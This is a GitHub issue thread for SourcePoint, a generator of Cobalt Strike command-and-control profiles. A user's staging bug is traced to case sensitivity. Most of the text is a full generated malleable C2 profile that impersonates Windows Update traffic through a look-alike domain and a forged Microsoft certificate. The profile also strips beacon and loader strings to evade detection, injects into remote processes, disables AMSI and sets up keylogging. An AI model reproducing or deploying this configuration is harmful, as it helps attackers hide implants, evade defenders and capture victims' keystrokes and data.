search

Tylous / SourcePoint

SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.
1.01k stars 150 forks source link

Staging Disabled In Profile #4

Closed monpolo closed 3 years ago

monpolo commented 3 years ago

This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.

Generating Profile:

┌──(kali㉿kali)-[~/Desktop/SourcePoint-main] └─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

       _____                            ____        _       __ 
      / ___/____  __  _______________  / __ \____  (_)___  / /_
      \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
     ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
    /____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
                                                    (@Tyl0us)

[] Preparing Varibles... [] Building Profile... [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It [] Post-Ex Process Name: gpupdate.exe [] Seleted Profile: WindowsUpdate [+] Profile Generated: teststage2.profile [+] Happy Hacking

Starting CS says

┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike] └─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[] Will use existing X509 certificate and keystore (for SSL) [+] I see you're into threat replication. ./teststage2.profile loaded. [] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop). [!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found. [!] Woah! Your profile disables hosted payload stages. Payload staging won't work. [+] Team server is up on 0.0.0.0:50050 [*] SHA256 hash of SSL cert is:

Output from teststage2.profile

set host_stage "True"; set sleeptime "44000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";

set data_jitter "50"; set smb_frame_header ""; set pipename "plugplay+3850"; set pipename_stager "plugplay+1395";

set tcp_frame_header ""; set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)"; set ssh_pipename "plugplay+##";

Manaully add these if your doing C2 over DNS (Future Release)

dns-beacon {

set dns_idle "1.2.3.4";

set dns_max_txt "199";

set dns_sleep "1";

set dns_ttl "5";

set maxdns "200";

set dns_stager_prepend "doc-stg-prepend";

set dns_stager_subhost "doc-stg-sh.";

set beacon "doc.bc.";

set get_A "doc.1a.";

set get_AAAA "doc.4a.";

set get_TXT "doc.tx.";

set put_metadata "doc.md.";

set put_output "doc.po.";

set ns_response "zero";

}

stage { set obfuscate "true"; set stomppe "true"; set cleanup "true"; set userwx "false"; set smartinject "true";

#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";

set checksum "0"; set compile_time "05 Jun 2028 09:16:06"; set entry_point "229200"; set image_size_x86 "397312"; set image_size_x64 "397312"; set name "Windows.System.Diagnostics.dll"; set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";

transform-x86 {
    prepend "\x90\x90\x90"; # NOP, NOP!
    strrep "ReflectiveLoader" "";
    strrep "This program cannot be run in DOS mode" "";
    strrep "NtQueueApcThread" "";
    strrep "IsWow64Process" "";
    strrep "HTTP/1.1 200 OK" "";
    strrep "Stack memory was corrupted" "";
    strrep "kernel32" "";
    strrep "beacon.dll" "";
    strrep "KERNEL32.dll" "";
    strrep "ADVAPI32.dll" "";
    strrep "WININET.dll" "";
    strrep "WS2_32.dll" "";
    strrep "DNSAPI.dll" "";
    strrep "Secur32.dll" "";
    strrep "VirtualProtectEx" "";
    strrep "VirtualProtect" "";
    strrep "VirtualAllocEx" "";
    strrep "VirtualAlloc" "";
    strrep "VirtualFree" "";
    strrep "VirtualQuery" "";
    strrep "RtlVirtualUnwind" "";
    strrep "sAlloc" "";
    strrep "FlsFree" "";
    strrep "FlsGetValue" "";
    strrep "FlsSetValue" "";
    strrep "InitializeCriticalSectionEx" "";
    strrep "CreateSemaphoreExW" "";
    strrep "SetThreadStackGuarantee" "";
    strrep "CreateThreadpoolTimer" "";
    strrep "SetThreadpoolTimer" "";
    strrep "WaitForThreadpoolTimerCallbacks" "";
    strrep "CloseThreadpoolTimer" "";
    strrep "CreateThreadpoolWait" "";
    strrep "SetThreadpoolWait" "";
    strrep "CloseThreadpoolWait" "";
    strrep "FlushProcessWriteBuffers" "";
    strrep "FreeLibraryWhenCallbackReturns" "";
    strrep "GetCurrentProcessorNumber" "";
    strrep "GetLogicalProcessorInformation" "";
    strrep "CreateSymbolicLinkW" "";
    strrep "SetDefaultDllDirectories" "";
    strrep "EnumSystemLocalesEx" "";
    strrep "CompareStringEx" "";
    strrep "GetDateFormatEx" "";
    strrep "GetLocaleInfoEx" "";
    strrep "GetTimeFormatEx" "";
    strrep "GetUserDefaultLocaleName" "";
    strrep "IsValidLocaleName" "";
    strrep "LCMapStringEx" "";
    strrep "GetCurrentPackageId" "";
    strrep "UNICODE" "";
    strrep "UTF-8" "";
    strrep "UTF-16LE" "";
    strrep "MessageBoxW" "";
    strrep "GetActiveWindow" "";
    strrep "GetLastActivePopup" "";
    strrep "GetUserObjectInformationW" "";
    strrep "GetProcessWindowStation" "";
    strrep "Sunday" "";
    strrep "Monday" "";
    strrep "Tuesday" "";
    strrep "Wednesday" "";
    strrep "Thursday" "";
    strrep "Friday" "";
    strrep "Saturday" "";
    strrep "January" "";
    strrep "February" "";
    strrep "March" "";
    strrep "April" "";
    strrep "June" "";
    strrep "July" "";
    strrep "August" "";
    strrep "September" "";
    strrep "October" "";
    strrep "November" "";
    strrep "December" "";
    strrep "MM/dd/yy" "";
    strrep "Stack memory around _alloca was corrupted" "";
    strrep "Unknown Runtime Check Error" "";
    strrep "Unknown Filename" "";
    strrep "Unknown Module Name" "";
    strrep "Run-Time Check Failure #%d - %s" "";
    strrep "Stack corrupted near unknown variable" "";
    strrep "Stack pointer corruption" "";
    strrep "Cast to smaller type causing loss of data" "";
    strrep "Stack memory corruption" "";
    strrep "Local variable used before initialization" "";
    strrep "Stack around _alloca corrupted" "";
    strrep "RegOpenKeyExW" "";
    strrep "egQueryValueExW" "";
    strrep "RegCloseKey" "";
    strrep "LibTomMath" "";
    strrep "Wow64DisableWow64FsRedirection" "";
    strrep "Wow64RevertWow64FsRedirection" "";
    strrep "Kerberos" "";

    }

transform-x64 {
    prepend "\x90\x90\x90"; # NOP, NOP!
    strrep "ReflectiveLoader" "";
    strrep "This program cannot be run in DOS mode" "";
    strrep "beacon.x64.dll" "";
    strrep "NtQueueApcThread" "";
    strrep "IsWow64Process" "";
    strrep "HTTP/1.1 200 OK" "";
    strrep "Stack memory was corrupted" "";
    strrep "kernel32" "";
    strrep "beacon.dll" "";
    strrep "KERNEL32.dll" "";
    strrep "ADVAPI32.dll" "";
    strrep "WININET.dll" "";
    strrep "WS2_32.dll" "";
    strrep "DNSAPI.dll" "";
    strrep "Secur32.dll" "";
    strrep "VirtualProtectEx" "";
    strrep "VirtualProtect" "";
    strrep "VirtualAllocEx" "";
    strrep "VirtualAlloc" "";
    strrep "VirtualFree" "";
    strrep "VirtualQuery" "";
    strrep "RtlVirtualUnwind" "";
    strrep "sAlloc" "";
    strrep "FlsFree" "";
    strrep "FlsGetValue" "";
    strrep "FlsSetValue" "";
    strrep "InitializeCriticalSectionEx" "";
    strrep "CreateSemaphoreExW" "";
    strrep "SetThreadStackGuarantee" "";
    strrep "CreateThreadpoolTimer" "";
    strrep "SetThreadpoolTimer" "";
    strrep "WaitForThreadpoolTimerCallbacks" "";
    strrep "CloseThreadpoolTimer" "";
    strrep "CreateThreadpoolWait" "";
    strrep "SetThreadpoolWait" "";
    strrep "CloseThreadpoolWait" "";
    strrep "FlushProcessWriteBuffers" "";
    strrep "FreeLibraryWhenCallbackReturns" "";
    strrep "GetCurrentProcessorNumber" "";
    strrep "GetLogicalProcessorInformation" "";
    strrep "CreateSymbolicLinkW" "";
    strrep "SetDefaultDllDirectories" "";
    strrep "EnumSystemLocalesEx" "";
    strrep "CompareStringEx" "";
    strrep "GetDateFormatEx" "";
    strrep "GetLocaleInfoEx" "";
    strrep "GetTimeFormatEx" "";
    strrep "GetUserDefaultLocaleName" "";
    strrep "IsValidLocaleName" "";
    strrep "LCMapStringEx" "";
    strrep "GetCurrentPackageId" "";
    strrep "UNICODE" "";
    strrep "UTF-8" "";
    strrep "UTF-16LE" "";
    strrep "MessageBoxW" "";
    strrep "GetActiveWindow" "";
    strrep "GetLastActivePopup" "";
    strrep "GetUserObjectInformationW" "";
    strrep "GetProcessWindowStation" "";
    strrep "Sunday" "";
    strrep "Monday" "";
    strrep "Tuesday" "";
    strrep "Wednesday" "";
    strrep "Thursday" "";
    strrep "Friday" "";
    strrep "Saturday" "";
    strrep "January" "";
    strrep "February" "";
    strrep "March" "";
    strrep "April" "";
    strrep "June" "";
    strrep "July" "";
    strrep "August" "";
    strrep "September" "";
    strrep "October" "";
    strrep "November" "";
    strrep "December" "";
    strrep "MM/dd/yy" "";
    strrep "Stack memory around _alloca was corrupted" "";
    strrep "Unknown Runtime Check Error" "";
    strrep "Unknown Filename" "";
    strrep "Unknown Module Name" "";
    strrep "Run-Time Check Failure #%d - %s" "";
    strrep "Stack corrupted near unknown variable" "";
    strrep "Stack pointer corruption" "";
    strrep "Cast to smaller type causing loss of data" "";
    strrep "Stack memory corruption" "";
    strrep "Local variable used before initialization" "";
    strrep "Stack around _alloca corrupted" "";
    strrep "RegOpenKeyExW" "";
    strrep "egQueryValueExW" "";
    strrep "RegCloseKey" "";
    strrep "LibTomMath" "";
    strrep "Wow64DisableWow64FsRedirection" "";
    strrep "Wow64RevertWow64FsRedirection" "";
    strrep "Kerberos" "";
    }

}

process-inject {

set remote memory allocation technique

set allocator "NtMapViewOfSection";

# shape the content and properties of what we will inject
set min_alloc "9457";
set userwx    "false";
set startrwx "true";

transform-x86 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

transform-x64 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

# specify how we execute code in the remote process
execute {
    CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
    NtQueueApcThread-s;
    SetThreadContext;
    CreateRemoteThread;
    CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
    RtlCreateUserThread;
}

}

post-ex {

control the temporary process we spawn to

set spawnto_x86 "%windir%\syswow64\gpupdate.exe"; set spawnto_x64 "%windir%\sysnative\gpupdate.exe";

# change the permissions and content of our post-ex DLLs
set obfuscate "true";

# pass key function pointers from Beacon to its child jobs
set smartinject "true";

# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";

# control the method used to log keystrokes 
set keylogger "SetWindowsHookEx";

}

http-get { set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";

client {

header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";

metadata {
    base64url;
    append ".cab";
    uri-append;
}

}

server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";

output {

    print;
}

} }

http-post { set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";

set verb "GET";

client {

header "Accept" "*/*";

id {
    prepend "download.windowsupdate.com/c/";
    header "Host";
}

output {
    base64url;
    append ".cab";
    uri-append;
}

}

server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";

output {
    print;
}

} }

http-stager { server { header "Content-Type" "application/vnd.ms-cab-compressed"; } }

https-certificate { set CN "0012eb.lwindowsupdate.com"; #Common Name set O "Microsoft Corporation"; #Organization Name set C "US"; #Country set L "Redmond"; #Locality set OU "Microsoft IT"; #Organizational Unit Name set ST "WA"; #State or Province set validity "365"; #Number of days the cert is valid for }

monpolo commented 3 years ago

Tinkered around a bit, if I comment out the first line so it's

set host_stage "True";

It works just fine now. Again, could very well be a silly mistake on my part but from how I'm interpreting your readme it seems this is unexpected behavior.

Tylous commented 3 years ago

Looks like it's a case-sensitivity issue. I will update it tonight and close this ticket once the new version is pushed. Thank you for letting me know.

Tylous commented 3 years ago

Fixed in version 1.2